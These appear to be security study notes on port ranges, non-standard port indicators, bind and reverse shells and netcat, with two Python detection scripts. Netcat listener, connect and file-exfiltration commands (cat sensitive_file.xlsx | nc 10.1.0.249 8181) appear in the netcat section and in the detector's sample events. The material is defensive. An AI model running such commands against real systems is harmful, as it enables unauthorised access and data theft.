Protocol and Port Use Scenarios


  • IANA maintains a list of well-known (0-1023) and registered (1024-49151) TCP and UDP port mappings
    • applications use these standard ports by default
    • but any application can be configured to work on any port
  • some malware uses particular ports, but there is no definitive list
    • can adapt and change easily
  • certain port ranges are more likely to indicate a compromise
    • dynamic and private range (49152-65535) can’t be registered with IANA
      • used by clients for temporary communication sessions
    • if an unknown port is open in this range, it may indicate malicious traffic
  • malware may communicate on a standard port using a different protocol
    • known as mismatched port/application traffic IoC

Non-standard Port Mitigation

  • the best way to mitigate use of non-standard ports is to configure firewalls to allow only whitelisted ports through the ingress and egress interfaces
    • difficult to put into practice
      • causes a lot of support issues
  • create detection rules for non-standard port usage on hosts from configuration documentation
    • can also detect mismatched protocol usage over standard port
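The detection rules described in the two sections above can be expressed as a small script. This is an added example, not part of the original notes: it classifies ports by the IANA ranges given above, compares a host's listening ports against a baseline taken from configuration documentation, and flags flows whose identified application protocol does not match the standard port they use. All host names, baselines, sample listeners and sample flows are constructed for illustration, and the protocol labels are assumed to come from a protocol-aware sensor.

```python
"""Detect undocumented listeners, dynamic-range listeners and
mismatched protocol/port traffic. Added example; all data is constructed."""

WELL_KNOWN = range(0, 1024)        # IANA well-known ports
REGISTERED = range(1024, 49152)    # IANA registered ports
DYNAMIC = range(49152, 65536)      # dynamic/private, cannot be registered

# Application protocol normally expected on a standard port (assumption).
EXPECTED_PROTOCOL = {22: "ssh", 53: "dns", 80: "http", 443: "tls"}


def port_range(port):
    """Name the IANA range a port number falls into."""
    if port in WELL_KNOWN:
        return "well-known"
    if port in REGISTERED:
        return "registered"
    if port in DYNAMIC:
        return "dynamic"
    raise ValueError(f"invalid port {port}")


# Constructed baseline: listening (proto, port) pairs each host is documented to expose.
BASELINE = {
    "web01": {("tcp", 22), ("tcp", 80), ("tcp", 443)},
    "ws17": {("tcp", 22)},
}

# Constructed listener inventory, e.g. collected periodically from each host.
LISTENERS = [
    {"host": "web01", "proto": "tcp", "port": 80},
    {"host": "web01", "proto": "tcp", "port": 443},
    {"host": "web01", "proto": "tcp", "port": 8080},
    {"host": "ws17", "proto": "tcp", "port": 22},
    {"host": "ws17", "proto": "tcp", "port": 51234},
]

# Constructed flow records; "app" is the protocol identified by a sensor.
FLOWS = [
    {"src": "ws17", "dst": "203.0.113.5", "dport": 443, "app": "tls"},
    {"src": "ws17", "dst": "203.0.113.9", "dport": 80, "app": "unknown-binary"},
    {"src": "web01", "dst": "198.51.100.2", "dport": 53, "app": "dns"},
]


def check_listeners(listeners, baseline):
    """Flag listeners absent from the host's documented configuration.
    A server socket in the dynamic/private range is rated higher, since
    that range is meant for temporary client-side sessions, not services."""
    findings = []
    for lst in listeners:
        if (lst["proto"], lst["port"]) in baseline.get(lst["host"], set()):
            continue
        rng = port_range(lst["port"])
        severity = "high" if rng == "dynamic" else "medium"
        findings.append((lst["host"], lst["port"], f"undocumented {rng} listener", severity))
    return findings


def check_flows(flows, expected=EXPECTED_PROTOCOL):
    """Flag the mismatched port/application IoC: a standard port carrying
    a protocol other than the one it is registered for."""
    findings = []
    for f in flows:
        want = expected.get(f["dport"])
        if want and f["app"] != want:
            msg = f"mismatched protocol: expected {want}, saw {f['app']}"
            findings.append((f["src"], f["dport"], msg, "high"))
    return findings


if __name__ == "__main__":
    for finding in check_listeners(LISTENERS, BASELINE) + check_flows(FLOWS):
        print(finding)
```

In practice the baseline would be generated from the same configuration management data that documents each server's role, so that a new legitimate service is added to the baseline and to the firewall rules in the same change.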

Shell and Reverse Shell

  • adversaries often use a Remote Access Tool/Trojan (RAT) to obtain a shell on the compromised system and run commands
  • a shell (bind shell) is where the attacker opens a listening port that exposes the command prompt on the local (compromised) host and connects to that port from a remote host
  • reverse shell is where the attacker opens a listening port on the remote host and causes the infected host to connect to it
    • traffic received by the infected host is redirected to the command prompt
    • typically used to exploit organizations that have not configured outbound traffic filtering at the firewall

Netcat

  • Netcat (nc) is an open-source tool native to Linux and often used by attackers
  • one common attack method:
    • uses a listener started on the victim system (IP: 10.1.0.1), set to pipe traffic from a program or file to the handler
    • any arbitrary, unused port will work for the listener
    • but using a registered port requires administrative access, e.g. nc -lvnp 8080
    • the nc 10.1.0.1 8080 command connects to the listener and grants access to the terminal
  • used the other way around, netcat can receive files
    • e.g., attacker runs cat sensitive_file.xlsx | nc 10.1.0.249 8181
      • on the handler (IP 10.1.0.249), attacker receives the file using: nc -l -p 8181 > copy_of_file.xlsx
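A defender can turn the invocation forms shown in this section into host-based detection rules over process command-line audit events. This is an added example, not part of the original notes: it tokenises each recorded command line, finds any nc/ncat/netcat stage in the pipeline, and reports whether it is a listener (optionally saving received data to a file) or an outbound connection (optionally with data piped into it). The event records, host names, users and the NC_NAMES set are constructed; the classification only covers the command forms that appear in these notes.

```python
"""Flag netcat listeners and outbound netcat connections in process
command-line audit events. Added example; all events are constructed."""
import os
import shlex

# Command names treated as netcat (assumption).
NC_NAMES = {"nc", "ncat", "netcat"}

# Constructed audit events, e.g. from process-creation logging.
EVENTS = [
    {"host": "ws17", "user": "svc", "cmdline": "nc -lvnp 8080"},
    {"host": "ws17", "user": "svc", "cmdline": "cat sensitive_file.xlsx | nc 10.1.0.249 8181"},
    {"host": "handler", "user": "op", "cmdline": "nc -l -p 8181 > copy_of_file.xlsx"},
    {"host": "web01", "user": "www", "cmdline": "grep -c error /var/log/app.log"},
]


def _tokens(cmdline):
    """Shell-style tokens; '|' and '>' become their own tokens."""
    lexer = shlex.shlex(cmdline, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    return list(lexer)


def _stages(tokens):
    """Split a token list into pipeline stages on '|'."""
    stages, current = [], []
    for tok in tokens:
        if tok == "|":
            stages.append(current)
            current = []
        else:
            current.append(tok)
    stages.append(current)
    return stages


def _describe_nc_stage(stage, piped_input):
    """Describe one netcat stage, or return None if it is not netcat."""
    if not stage or os.path.basename(stage[0]) not in NC_NAMES:
        return None
    args = stage[1:]
    outfile = None
    if ">" in args:                      # stdout redirected to a file
        i = args.index(">")
        outfile = args[i + 1] if i + 1 < len(args) else None
        args = args[:i]
    # -l in any short-flag cluster (e.g. -l, -lvnp) means listen mode.
    short_flags = [a for a in args if a.startswith("-") and not a.startswith("--")]
    is_listener = any("l" in f[1:] for f in short_flags)
    positionals = [a for a in args if not a.startswith("-")]
    port = next((p for p in reversed(positionals) if p.isdigit()), "?")
    if is_listener:
        msg = f"netcat listener on port {port}"
        if outfile:
            msg += f" saving received data to {outfile}"
        return msg
    target = positionals[0] if len(positionals) >= 2 else "?"
    msg = f"outbound netcat connection to {target}:{port}"
    return ("data piped into " + msg) if piped_input else msg


def analyze_cmdline(cmdline):
    """Return a list of findings for one command line (empty if benign)."""
    findings = []
    for idx, stage in enumerate(_stages(_tokens(cmdline))):
        desc = _describe_nc_stage(stage, piped_input=idx > 0)
        if desc:
            findings.append(desc)
    return findings


def scan_events(events):
    """Apply analyze_cmdline to each event; return (host, user, finding) tuples."""
    return [(e["host"], e["user"], f) for e in events for f in analyze_cmdline(e["cmdline"])]


if __name__ == "__main__":
    for hit in scan_events(EVENTS):
        print(hit)
```

Because the listener on the victim system and the data push from it both run as ordinary processes, process-creation logging on the endpoints (paired with the egress filtering discussed above, which stops the reverse connection from completing) gives two independent chances to catch this activity.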